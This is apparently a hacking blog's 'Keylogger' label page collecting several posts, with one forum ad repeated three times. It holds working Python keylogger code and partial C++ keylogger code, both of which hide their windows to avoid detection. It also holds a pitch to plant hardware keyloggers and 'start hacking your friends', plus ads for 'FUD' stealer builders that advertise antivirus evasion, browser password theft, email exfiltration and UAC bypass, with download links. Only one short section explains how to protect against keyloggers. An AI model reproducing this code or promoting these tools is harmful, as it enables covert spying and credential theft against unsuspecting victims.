Showing posts with label Keylogger. Show all posts
Showing posts with label Keylogger. Show all posts

How To Make A Python Keylogger

This is tutorial that explains how to make simple keylogger that records keystrokes activities on pc and store it in .txt file. To make our keylogger we’ll use python. Why python? Python is simple powerfull and flexible programming language. By my opinion the best ,with few lines of code you can do amazing things.If you never used python , read my previous article How To Create Your First Python Program where I explained how to run simple “Hello World” script .
To make programming easier python has “Modules” that contains useful code that can extend python functionalities.
For python keylogger we’ll need to download pywin32 & pyHook modules


Step 1
Download and install pywin32 from this LINK
pywin32

Step 2
Download and install pyhook from this LINK
pyhook

Step 3
Launch IDLE python as Administrator and click on FIle -> New Window
idle python
new windows
Here is complete keylogger code , described with comments : Python Keylogger Code :

Source code   
import win32api
import win32console
import win32gui
import pythoncom,pyHook
 
win=win32console.GetConsoleWindow()
win32gui.ShowWindow(win,0)
 
def OnKeyboardEvent(event):
if event.Ascii==5:
_exit(1)
if event.Ascii !=0 or 8:
#open output.txt to read current keystrokes
f=open('c:\output.txt','r+')
buffer=f.read()
f.close()
#open output.txt to write current + new keystrokes
f=open('c:\output.txt','w')
keylogs=chr(event.Ascii)
if event.Ascii==13:
keylogs='/n'
buffer+=keylogs
f.write(buffer)
f.close()
# create a hook manager object
hm=pyHook.HookManager()
hm.KeyDown=OnKeyboardEvent
# set the hook
hm.HookKeyboard()
# wait forever
pythoncom.PumpMessages()
In the new window copy paste python keylogger code and click on Run -> Run Module .
kezlogger run

After this your keylogger will be launched and all keystroke activity will be stored in ‘c:\output.txt’. In the next tutorial we’ll extend python keylogger with fonctionality that send “output.txt” to specific email address. You can found keylogger code on my github account https://github.com/blaz1988/keylogger/blob/master/keylogger.py
If you’re loking for more poerful keylogger check out Facebook Keylogger

Hack Email accounts Using a Hardware Keylogger

Did you know key logging is the simplest way to hack email accounts ? So far in this blog I've  discussed about software key loggers such as Sniperspy for Windows , Sniperspy For Mac and  Realtimespy
If your new to the concept of  Key logging i would suggest you to read my previous articles What are KeyLoggers , How to Hack Any Email Account? to get a better understanding of the subject

Software Key loggers are not the only keyloggers that are used for hacking email or facebook accounts, there's an other type of keyloggers and they are called  Hardware keyloggers.In this article i'll explain how you can hack facebook or any other email account using a hardware keyloggers
Hardware Keyloggers are used for keystroke logging, a method of capturing and recording computer user keystrokes. They plug in between a computer keyboard and a computer and log all keyboard activity to an internal memory. They are designed to work with PS/2 keyboards, and more recently with USB keyboards.

A hardware keylogger looks like a normal USB drive or any other computer peripheral so that the victim can never doubt that it is a keylogger, So by looking at it’s appearance it is impossible to identify it as a keylogger., Here is how a hardware keylogger may look like



How To Use HardWare Key logger to Hack Facebook account?
Installation of a Hardware key logger is very easy, Simply plug the Hardware keylogger in between the USB keyboard and the USB port.The following image shows how a keylogger is installed.



Once installed the keylogger starts recording each and every keystroke of the keyboard including email passwords and other confidential information.and stores them in separate log files as shown


Thus a hacker can use the information stored in a Hardware key logger to hack Face book or any other email account


Which is the Best Hardware Keylogger  ?
With my experience of more than 4 years in the field of  Hacking and security I suggest only one Hardware key logger KeyCobra Hardware Keylogger which I think is best and has a very low antivirus detection

KeyCobra Hardware Keylogger
KeyCobra is the world's smallest and smartest USB hardware keylogger. The KeyCobraUSB keyboard logger comes in a standard version (4MB memory capacity which can capture  2,000,000 keystrokes - over 1,000 pages of text), and a Venom Version (2GB memory capacity -which can capture billion keystrokes - over 1 million pages of text),  Its Completely invisible for computer operation,  It is also  compatible with Mac.


So what are you waiting for, Grab a KeyCobra Hardware Keylogger, and start hacking your friends ,You Can Buy a KeyCobra Hardware Keylogger  From the Following Link



If you any doubts regarding the article , please fell free to post a comment

How to code keylogger in C programming Language


How to code keylogger in C programming language : C codechamp has brought you a detailed tutorial on how to write a Keylogger code in C programming.

C program of Keylogger or keystroke loggerKeylogger is a computer program which captures all the key strokes pressed by user in real time. It captures all the keys and write them to some file say log.txt and stores it on computer hard disk. Now sending these logs to emails or FTP address depends upon the type of keylogger that is keylogger is remote keylogger or physical keylogger. Physical keyloggers are useful when you have physical access to that system and can retrieve logs personally. While remote keyloggers can be used from anywhere in the world, the only requirement is that victim must have internet connection. Today we will be writing a C program of Physical keylogger or Keystroke logger which requires physical access of the system. We will be extending our logic in further programs to make it remote keylogger which sends logs to FTP’s and Emails directly. So first of all lets see how simple keylogger program works…

C program of Keylogger or Keystroke logger


Algorithm for writing a Simple Keylogger :
1. Create an Empty log file for storing keylogs.
2. Intercept keys pressed by user using GetAsyncKeyState() function.
3.  Store these intercepted values in file.
4.  Hide the Running Window Dialog to make it undetectable.
5.  Use while loop to make it running in all conditions.
6.  Add Sleep() function to reduce the CPU usage to 0%.

Now let us see the C program of keylogger or keystroke logger which intercepts all the keys pressed by the user and store these pressed keys in log file.

C program of Keylogger or keystroke logger :
#include<iostream>
#include<windows.h>
#include<fstream>
#include<time.h>
using namespace std;

int main()
{
 bool runlogger = true;
 ofstream log;
 //where your logs will be stored
 log.open("C:\\log.txt", ofstream::out);
 //displaying error message when unable to open file
 if(log.fail())
  {
   printf("Error in opening log.txt file\n");
   }
  //Code for hiding running dialog
  HWND hideIt = FindWindow("ConsoleWindowClass",NULL);
  ShowWindow(hideIt,0);
  //Logic for capturing keystokes ........
  ...................
To view the complete C program visit my website on C programming :

C program of Keylogger or keystroke logger | C codechamp

 Bookmark my website for Learning C programming like champs.

What is keylogger ?




        1. What is keylogger ?
         
           You might have heard about keyloggers but really dont know what they are reading this article will clear your mind. A keylogger also know as keystroke logger is software or hardware device which monitors each and every key typed by you on your keyboard. You can not identify the presence of keylogger on your computer since it runs in background and also it is not listed in task manager or control panel. It can be used by parents to keep eye on their childrens or company owner to spy on their employes.


       2. How it can harm you ?
  • It can be used by your enemy or friend to get sensitive information such as your username and password, Bank credit card details etc.
  • Example: You login in to your Facebook account from a computer in which keylogger is install then your username and password will be captured.
       3. Types of  keyloggers 

          There are two types of keylogger hardware keylogger and software keylogger. Software keylogger is install in your computer where as a Hardware keylogger is attached to your keyboard. Looking at below images will clear your mind.

                              HARDWARE KEYLOGGER                                  
 

 SOFTWARE KEYLOGGER
 
                                 
       4. How to Protect yourself from keyloggers ?
  • Never use your online banking from cyber cafe. If you want to use then you can try this method. open notepad and type anything Then copy and paste each word that comes in your username or password.
  • You can even use above method to protect your facebook profile, yahoo or gmail id.
  • When you enter cyber cafe make sure that no hardware device is attached to keyboard wire. Its look something similar to above image.FvusygETuUqYy-isemaLDu7puB4

Syslogger Beta [0/35] [FUD] [Stealers] [Clipboard Logger] [Mail Encryption] [Antis]

Screenshot



[Image: naamloosptv.png]



Antis



[x] AntiAnubis

[x] AntiBitdefender

[x] AntiKaspersky

[x] AntiMalwarebytes


[x] AntiNod32

[x] AntiNorman

[x] AntiOllydbg

[x] AntiOutpost

[x] AntiWireshark



Stealers



[x] Google Chrome (latest version)

[x] Mozilla Firefox (latest version)


[x] Opera (version 10)

[x] Windows Live Messenger (latest version)



Features



[x] Antis

[x] Mail Encryption

[x] Stealers

[x] Cookie Deletion

[x] Download Link Encryption


[x] AV Site Blocker

[x] USB Spread

[x] Startup

[x] Taskmanager Killer

[x] Clipboard Logger

[x] Steam Forcer

[x] Downloader

[x] Fake Error

[x] Melt


[x] Screen Logger





Virus scan builder



File Info



Report date: 2011-10-10.

Scan Occured: [Image: result_time.php?t=i&w=MjI2NTI3]


Link to scan: http://my-avscan.com/result.php?scan=MjI2NTI3

File name: Syslogger_Builder.exe

File size: 472064 bytes

MD5 Hash: 14d6dbece5d9c74747ad7c39ad7ae6f6

SHA1 Hash: 9ade2e4561683b7e0641cf8275401d2ad4709229

Detection rate: 0 out of 35

Status: CLEAN




Detections



AVG - Clean.

Acavir - Clean.

Avast 5 -Clean.

Avast -Clean.


Avira -Clean.

BitDefender -Clean.

VirusBuster Internet Security -Clean.

Clam Antivirus -Clean.

COMODO Internet Security -Clean.


DrWeb -Clean.

eTrust-Vet -Clean.

F-PROT Antivirus -Clean.

F-Secure Internet Security -Clean.

G Data -Clean.


IKARUS Security-Clean.

Kaspersky Antivirus -Clean.

McAfee -Clean.

MS Security Essentials -Clean.

ESET NOD32 -Clean.


Norman -Clean.

Norton -Clean.

Panda Security -Clean.

A-Squared Security -Clean.

Quick Heal Antivirus -Clean.


Rising Antivirus -Clean.

Solo Antivirus -Clean.

Sophos -Clean.

Trend Micro Internet Security -Clean.

VBA32 Antivirus -Clean.


Vexira Antivirus -Clean.

Webroot Internet Security -Clean.

Zoner AntiVirus -Clean.

Ad-Aware -Clean.

AhnLab V3 Internet Security -Clean.


Bullguard -Clean.



Scan report generated by

My-AVScan.com
DOWNLOAD HERE 

Password

Code:
-95.02678571428571

-95.0625

-95.08928571428571


-95.32142857142857

-95.51785714285714

-95.21428571428571

-95.375

-94.94642857142857

-95.02678571428571

-95.0625

-95.46428571428571

-95.33035714285714


-95.51785714285714

-95.21428571428571

-95.375

-94.94642857142857

-95.02678571428571

-95.0625

-95.01785714285714

-94.92857142857143

-95.51785714285714


-95.21428571428571

-95.375

-94.94642857142857

-95.02678571428571

-95.0625

-95.08928571428571

-95.33035714285714

-95.51785714285714

-95.21428571428571


-95.375

-94.94642857142857

-95.02678571428571

-95.0625

-95.01785714285714

-95.33928571428571

-95.51785714285714

-95.21428571428571

-95.375


-94.94642857142857

-95.02678571428571

-95.0625

-95.03571428571429

-94.92857142857143

-95.51785714285714

-95.21428571428571

-95.375

-94.94642857142857


-95.03571428571429

-95.33928571428571

-95.42857142857143

-95.5625

-95.51785714285714

-95.21428571428571

-95.375

-94.94642857142857

-95.02678571428571


-95.0625

-95.46428571428571

-94.94642857142857

-95.51785714285714

-95.21428571428571

-95.375

-94.94642857142857

-95.02678571428571

-95.0625


-95.08928571428571

-94.91964285714286

-95.51785714285714

-95.21428571428571

-95.375

-94.94642857142857

-95.02678571428571

-95.0625

-95.28571428571429


-95.33035714285714

-95.51785714285714

-95.21428571428571

-95.375

-94.94642857142857

-95.02678571428571

-95.0625

-95.01785714285714

-94.94642857142857


-95.51785714285714

-95.21428571428571

-95.375

-94.94642857142857

-95.02678571428571

-95.0625

-95.03571428571429

-95.58035714285714

-95.51785714285714


-95.21428571428571

-95.375

-94.94642857142857

-95.02678571428571

-95.0625

-95.01785714285714

-95.57142857142857

-95.51785714285714

-95.21428571428571


-95.375

-94.94642857142857

-95.03571428571429

-95.33928571428571

-95.42857142857143

-94.92857142857143

-95.51785714285714

-95.21428571428571

-95.375


-94.94642857142857

-95.02678571428571

-95.0625

-95.08928571428571

-95.32142857142857

-95.51785714285714

-95.21428571428571

-95.375

-94.94642857142857


-95.02678571428571

-95.0625

-95.28571428571429

-95.58035714285714


Encrypted with ZONG22 --> ZARA-128 (key: uio) --> TRIPO-5 --> OKTO-3 (key: opa)

[FUD]Predator Pain HiJacker v.5[Keylogger,Stealers,Easy USE,Auto Update,Encrypted]

Well it's been a while since i made a free logger and if you remember back in your Predator days Predator Pain was the most widely used free logger around because it was effective and it was FUD.

Now the older versions are more detected than Aradamax and kinda out dated. I recieved many PMS requesting for me to FUD Predator or make a newer updated version since it was the only free logge




around that actually worked as described. Well Predator Pain is back introducing Predator Hijacker a new state of the art keylogger better than any and all free versions around find out why and this

time Predator Free version is here to stay.



[Image: KgYqaA.png]




[Image: FNS0f1.png]



[Image: PSJDb1.png]



[Image: hgfdhgfd.png]



[X]Uses the best Global Hooks known to man *Keystrokes will not be an issue in this case.

[X]Ability to send to any Email Host *Aol, Hotmail, Googlemail, Gmail,
Live, Yahoo, your own email server, you name it as long as you know the
correct port and email host you can send it there.

[X]Encrypted Smpt Server w/ (RC4 Encryption)

[X]Encrypted Email w/ (RC4 Encryption)

[X]Encrypted Password w/ (RC4 Encryption)


[X]Interval (Send every X Minutes you desire)

[X]Ability to test your email make sure everything is correct

[X]Add to Startup

[X]Bypass UAC

[X]Notify Email

[X]Clipboard Logger

[X]Screenshot Logger

[X]File Downloader

[X]Fake Error Message


[X]Assembly Change



[X]Icon Change



[X]File Pumper

[X]Auto Updater: Contains an auto updater everytime a new version is
avaliable it will delete this version and send you a new version to
download this is to fix bugs if any are found, new features, and FUD
Updates on a weekly update.



Predator Pain
Hijacker is the only Free Logger on HF that steals the newest web
broswers avaliable how great is that i was debating whether or not to
add these features but decided why not i haven't made a new logger in a
long time.




Stealers:



[X]Firefox (Newest and Older Versions) *Steals all versions of Firefox 3.x.x., 4.x.x., 5.x.x.

[X]Internet Explorer (Newest and Older Versions) *Steals all versions of IE 6.x,7.x,8.x,9.x

[X]Opera (Newest and Older Versions) *Steals all versions of Opera 10 and 11

[X]Google Chrome (Newest and Older Versions) *Steals all Versions of Google chrome old to newest

[X]Minecraft - *What MINECRAFT STEALER? Yes, i added Minecraft was
debating whether or not to make it runescape took me 20 minutes to
figure it out then i decided Runescape is worth more so ill make it
Minecraft. All versions of Runescape are avaliable on Private Version










Code:






[FUD]Predator Pain HiJacker v.5[Keylogger,Stealers,Easy USE,Auto Update,Encrypted]

Well it's been a while since i made a free logger and if you remember back in your Predator days Predator Pain was the most widely used free logger around because it was effective and it was FUD.

Now the older versions are more detected than Aradamax and kinda out dated. I recieved many PMS requesting for me to FUD Predator or make a newer updated version since it was the only free logge




around that actually worked as described. Well Predator Pain is back introducing Predator Hijacker a new state of the art keylogger better than any and all free versions around find out why and this

time Predator Free version is here to stay.



[Image: KgYqaA.png]




[Image: FNS0f1.png]



[Image: PSJDb1.png]



[Image: hgfdhgfd.png]



[X]Uses the best Global Hooks known to man *Keystrokes will not be an issue in this case.

[X]Ability to send to any Email Host *Aol, Hotmail, Googlemail, Gmail,
Live, Yahoo, your own email server, you name it as long as you know the
correct port and email host you can send it there.

[X]Encrypted Smpt Server w/ (RC4 Encryption)

[X]Encrypted Email w/ (RC4 Encryption)

[X]Encrypted Password w/ (RC4 Encryption)


[X]Interval (Send every X Minutes you desire)

[X]Ability to test your email make sure everything is correct

[X]Add to Startup

[X]Bypass UAC

[X]Notify Email

[X]Clipboard Logger

[X]Screenshot Logger

[X]File Downloader

[X]Fake Error Message


[X]Assembly Change



[X]Icon Change



[X]File Pumper

[X]Auto Updater: Contains an auto updater everytime a new version is
avaliable it will delete this version and send you a new version to
download this is to fix bugs if any are found, new features, and FUD
Updates on a weekly update.



Predator Pain
Hijacker is the only Free Logger on HF that steals the newest web
broswers avaliable how great is that i was debating whether or not to
add these features but decided why not i haven't made a new logger in a
long time.




Stealers:



[X]Firefox (Newest and Older Versions) *Steals all versions of Firefox 3.x.x., 4.x.x., 5.x.x.

[X]Internet Explorer (Newest and Older Versions) *Steals all versions of IE 6.x,7.x,8.x,9.x

[X]Opera (Newest and Older Versions) *Steals all versions of Opera 10 and 11

[X]Google Chrome (Newest and Older Versions) *Steals all Versions of Google chrome old to newest

[X]Minecraft - *What MINECRAFT STEALER? Yes, i added Minecraft was
debating whether or not to make it runescape took me 20 minutes to
figure it out then i decided Runescape is worth more so ill make it
Minecraft. All versions of Runescape are avaliable on Private Version










Code:






[UD 4/33] Grieve Logger V4 [Binder At Last][Many Features][Awesome GUI][Stable]





Grieve Logger V4






Here We Go Again...





Screenshot:
















Features:


  • UD - 4/33

  • Use Any E-Mail Provider For Your KeyLogs


  • Add To Start Up

  • Kill Task Manager

  • Hide File After Execution

  • Disable System Restore

  • Block AntiVirus Sites

  • Disable Registry Editing

  • Protect Keylogger Process - Stops slave From Ending Your Keylogger's Process

  • Antis

  • Obfuscate Output


  • Anti-Reflector - Stops slave Decompiling Your Server And Finding Your E-Mail Address/Password

  • Icon Changer

  • Binder

  • Fake Error Message

  • Custom Sending Interval


Scans:

Builder:







File Info



Report date: 2011-05-30.

Scan Occured: [Image: result_time.php?t=i&w=NTIzNjI=]

Link to scan: http://myavscan.com/result.php?scan=NTIzNjI=

File name: Grieve_Logger_Public_V4.exe


File size: 2610688 bytes

MD5 Hash: 1cf34b70e46f1758e9cb5f6da48e044f

SHA1 Hash: 34320232e8abbe66cd0d715d904a900756ed8f7c

Detection rate: 0 out of 33

Status: CLEAN



Detections




AVG - Clean.

Acavir - Clean.

Avast 5 -Clean.

Avast -Clean.

Avira -Clean.


BitDefender -Clean.

VirusBuster Internet Security -Clean.

Clam Antivirus -Clean.

COMODO Internet Security -Clean.

DrWeb -Clean.


eTrust-Vet -Clean.

F-PROT Antivirus -Clean.

F-Secure Internet Security -Clean.

G Data -Clean.

IKARUS Security-Clean.


Kaspersky Antivirus -Clean.

McAfee -Clean.

MS Security Essentials -Clean.

ESET NOD32 -Clean.

Norman -Clean.


Norton -Clean.

Panda Security -Clean.

A-Squared Security -Clean.

Quick Heal Antivirus -Clean.

Rising Antivirus -Clean.


Solo Antivirus -Clean.

Sophos -Clean.

Trend Micro Internet Security -Clean.

VBA32 Antivirus -Clean.

Vexira Antivirus -Clean.


Webroot Internet Security -Clean.

Zoner AntiVirus -Clean.

AhnLab V3 Internet Security -Clean.



Scan report generated by

MyAvScan.com





Stub:




File Info



Report date: 2011-05-30.

Scan Occured: [Image: result_time.php?t=i&w=NTIzNTU=]


Link to scan: http://myavscan.com/result.php?scan=NTIzNTU=

File name: Stub.exe

File size: 119296 bytes

MD5 Hash: 8fe5ec235c9a64d9bc5a4303ed22ade6

SHA1 Hash: d28a5fbc4a208ee5e8db2db3c2c5e21ae65fdb6e

Detection rate: 4 out of 33

Status: INFECTED




Detections



AVG - Clean.

Acavir - Clean.

Avast 5 -Clean.

Avast -Clean.


Avira -TR/Dropper.Gen.

BitDefender -Clean.

VirusBuster Internet Security -Clean.

Clam Antivirus -Clean.

COMODO Internet Security -Clean.


DrWeb -Clean.

eTrust-Vet -Clean.

F-PROT Antivirus -Clean.

F-Secure Internet Security -Clean.

G Data -Clean.


IKARUS Security-Worm.MSIL.

Kaspersky Antivirus -Clean.

McAfee -Clean.

MS Security Essentials -Clean.

ESET NOD32 -Clean.


Norman -Clean.

Norton -Clean.

Panda Security -Clean.

A-Squared Security -Worm.MSIL!IK.

Quick Heal Antivirus -Clean.


Rising Antivirus -Clean.

Solo Antivirus -Clean.

Sophos -Clean.

Trend Micro Internet Security -Clean.

VBA32 Antivirus -Clean.


Vexira Antivirus -Clean.

Webroot Internet Security -Clean.

Zoner AntiVirus -INFECTED [Dropper.Generic2.MMJ].

AhnLab V3 Internet Security -Clean.




Scan report generated by

MyAvScan.com




Built Server:




File Info




Report date: 2011-05-30.

Scan Occured: [Image: result_time.php?t=i&w=NTIzNTk=]

Link to scan: http://myavscan.com/result.php?scan=NTIzNTk=

File name: Server_30th_May.exe

File size: 510976 bytes

MD5 Hash: bdc75f205b166153af3c2f1156a10760

SHA1 Hash: b037cd0146717c7b4ad2a3eff00d43ed4e44d483

Detection rate: 4 out of 33


Status: INFECTED



Detections



AVG - Clean.

Acavir - Clean.

Avast 5 -Clean.


Avast -Clean.

Avira -TR/Dropper.Gen.

BitDefender -Clean.

VirusBuster Internet Security -Clean.

Clam Antivirus -Clean.


COMODO Internet Security -Clean.

DrWeb -Clean.

eTrust-Vet -Clean.

F-PROT Antivirus -Clean.

F-Secure Internet Security -Clean.


G Data -Clean.

IKARUS Security-Worm.MSIL.

Kaspersky Antivirus -Clean.

McAfee -Clean.

MS Security Essentials -Clean.


ESET NOD32 -Clean.

Norman -Clean.

Norton -Clean.

Panda Security -Clean.

A-Squared Security -Worm.MSIL!IK.


Quick Heal Antivirus -Clean.

Rising Antivirus -Clean.

Solo Antivirus -Clean.

Sophos -Clean.

Trend Micro Internet Security -Clean.


VBA32 Antivirus -Clean.

Vexira Antivirus -Clean.

Webroot Internet Security -Clean.

Zoner AntiVirus -INFECTED [Dropper.Generic2.MMJ].

AhnLab V3 Internet Security -Clean.




Scan report generated by

MyAvScan.com




Download Link:

http://adf.ly/49qMj





Code:



vjvhNT8nvDLmvjLlvz8hvzAg6zBBvTAovjAjvDQpNz0kNjQpvTAg6zBBvjvhvDwjNT5oNjvnvjQkNTwg ​ 6zBBvj0hvDAkNzQjvjwovDUkvTAg6zBBvjvovDqgvD0nvTqkNTUmNTwg6zBBvTAovjAjvzQoNzqjOz0m ​ vzLg6zBBvj0gNDUpNjUiNTvnvj8hvTAg6zBBvj8gNzqhNDqkvjwhNz8gvTwg6zBBvjvnOz0pOzQjOD8m ​ vTApvDAg6zBBvTAovjAiODUhNTvmND0lvTvg6zBBvj5kNz0ovTwgNj8gNj5iNTAg6zBBvj8gvjQkNjwm ​ NTAnODwmvjwg6zBBvjvhNT0hNjviODqoND5mvjAg6zBBvTAovj5nOD5pvjwmNzvivzvg6zBBvjqhNzQn ​ NzLjNjUmNzLlvT0g6zBBvjvhNz5jvDQlOzAhvjLiOzwg6zBBvjvnOzvkvz0lNzvjNT5pvjAg6zBBvTAo ​ vj5nNjvgvjQnvjLlvTAg6zBBvjLpOz0mvD0lNDUmNz5kNTAg6zBBvjqoNzAhNTwiOD8kNzwpvzAg6zBB ​ vjvnOzQlvjqnND5iOz0jODLg6zBBvTAovjAjvzQoNzqjOz0mvzLg6zBBvjqovD8iOD0iODAkvDLgNDAg ​ 6zBBvjLjOz0gvD5lNjvkNT8jNjAg6zBBvjvhNTAgNjLoODwnNDvlODwg6zBBvTAovjAjvzQoNzqjOz0m ​ vzLg6zBBvjwkvDqkNDAkNT8gNjApvDAg6zBBvjLkvzAivD5nvDqlvzwiNDLg6zBBvjvhNT8nNDLivTAh ​ ODvpvDAg6zBBvTAovjAjvDQpNz0kNjQpvTAg6zBBvj0gNDUpNjUiNTvnvj8hvTAg6zBBvjLkvD8mNTUj ​ NDLovjUnNjAg6zBBvjvhNT8nvDLmvjLlvz8hvzAg6zBBvTAovjAjvDQpNz0kNjQpvTAg6zBBvjqhNzQn ​ NDLkODvnvjUovjAg6zBBvj8gNzLivDQhNDvlvD0pOzAg6zBBvjvovDqgND0jvD0hvjLkNzwg6zBBvTAo ​ vjAjvzQoNzqjOz0mvzLg6zBBvjLjND8gNzLoNz8gNTUlNz0g6zBBvjLjOz8lvj0pvTQhNDqoNzLg6zBB ​ vjvnOz0pOzQjOD8mvTApvDAg6zBBvTAovj5nNjvgvjQnvjLlvTAg6zBBuz0ivzwjNz5ivz0lvDwnvCon ​Nw//












Encrypted With:

PlainText -> FERON-74 -> BASE-64 -> ZARA-128 -> OKTO3 -> ESAB-46




L33T's And UB3R's Can PM Me For The Password



Credits:


  • Classical

  • pr0t0typ3

  • .bLaZeD

  • Deathader

















[FUD]Predator Pain HiJacker v.5[Keylogger,Stealers,Easy USE,Auto Update,Encrypted]


Well it's been a while since i made a free logger and if you remember back in your Predator days Predator Pain was the most widely used free logger around because it was effective and it was FUD.

Now the older versions are more detected than Aradamax and kinda out dated. I recieved many PMS requesting for me to FUD Predator or make a newer updated version since it was the only free logge




around that actually worked as described. Well Predator Pain is back introducing Predator Hijacker a new state of the art keylogger better than any and all free versions around find out why and this

time Predator Free version is here to stay.



[Image: KgYqaA.png]




[Image: FNS0f1.png]



[Image: PSJDb1.png]



[Image: hgfdhgfd.png]



[X]Uses the best Global Hooks known to man *Keystrokes will not be an issue in this case.

[X]Ability to send to any Email Host *Aol, Hotmail, Googlemail, Gmail,
Live, Yahoo, your own email server, you name it as long as you know the
correct port and email host you can send it there.

[X]Encrypted Smpt Server w/ (RC4 Encryption)

[X]Encrypted Email w/ (RC4 Encryption)

[X]Encrypted Password w/ (RC4 Encryption)


[X]Interval (Send every X Minutes you desire)

[X]Ability to test your email make sure everything is correct

[X]Add to Startup

[X]Bypass UAC

[X]Notify Email

[X]Clipboard Logger

[X]Screenshot Logger

[X]File Downloader

[X]Fake Error Message


[X]Assembly Change



[X]Icon Change



[X]File Pumper

[X]Auto Updater: Contains an auto updater everytime a new version is
avaliable it will delete this version and send you a new version to
download this is to fix bugs if any are found, new features, and FUD
Updates on a weekly update.



Predator Pain
Hijacker is the only Free Logger on HF that steals the newest web
broswers avaliable how great is that i was debating whether or not to
add these features but decided why not i haven't made a new logger in a
long time.




Stealers:



[X]Firefox (Newest and Older Versions) *Steals all versions of Firefox 3.x.x., 4.x.x., 5.x.x.

[X]Internet Explorer (Newest and Older Versions) *Steals all versions of IE 6.x,7.x,8.x,9.x

[X]Opera (Newest and Older Versions) *Steals all versions of Opera 10 and 11

[X]Google Chrome (Newest and Older Versions) *Steals all Versions of Google chrome old to newest

[X]Minecraft - *What MINECRAFT STEALER? Yes, i added Minecraft was
debating whether or not to make it runescape took me 20 minutes to
figure it out then i decided Runescape is worth more so ill make it
Minecraft. All versions of Runescape are avaliable on Private Version















 

Copyright @ 2013 OPEN HACKING.